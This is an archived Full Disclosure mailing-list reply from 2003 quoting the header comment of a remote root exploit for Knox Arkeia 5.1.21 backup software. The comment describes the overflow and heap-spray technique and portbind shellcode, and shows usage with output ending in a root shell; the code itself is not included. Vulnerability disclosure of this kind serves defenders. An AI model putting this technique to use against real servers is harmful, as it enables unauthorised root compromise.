Full Disclosure mailing list archives
Re: Knox Arkeia 5.1.21 local/remote root exploit
From: David Hane <dlhane () sbcglobal net>
Date: Fri, 19 Sep 2003 14:29:16 -0700
Have you tested this on other versions? DH On Friday 19 September 2003 10:36, A. C. wrote:
Exploit attached for Knox Arkeia Pro v5.1.21 backup software from http://www.arkeia.com. /* * Knox Arkiea arkiead local/remote root exploit. * * Portbind 5074 shellcode * * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable. * * NULLs out least significant byte of EBP to pull EIP out of overflow buffer. * A previous request forces a large allocation of NOP's + shellcode in heap * memory. Find additional targets by searching the heap for NOP's after a * crash. safeaddr must point to any area of memory that is read/writable * and won't mess with program/shellcode flow. * * ./ark_sink host targetnum * [user@host dir]$ ./ark_sink 192.168.1.2 1 * [*] Connected to 192.168.1.2:617 * [*] Connected to 192.168.1.2:617 * [*] Sending nops+shellcode * [*] Done, sleeping * [*] Sending overflow * [*] Done * [*] Sleeping and connecting remote shell * [*] Connected to 192.168.1.2:5074 * [*] Success, enjoy * id * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) * * */ __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Knox Arkeia 5.1.21 local/remote root exploit A. C. (Sep 19)
- Re: Knox Arkeia 5.1.21 local/remote root exploit David Hane (Sep 19)
- Re: Knox Arkeia 5.1.21 local/remote root exploit David Bernick (Sep 19)
- Re: Knox Arkeia 5.1.21 local/remote root exploit Christian Gut (Sep 20)
- Re: Knox Arkeia 5.1.21 local/remote root exploit David Hane (Sep 19)
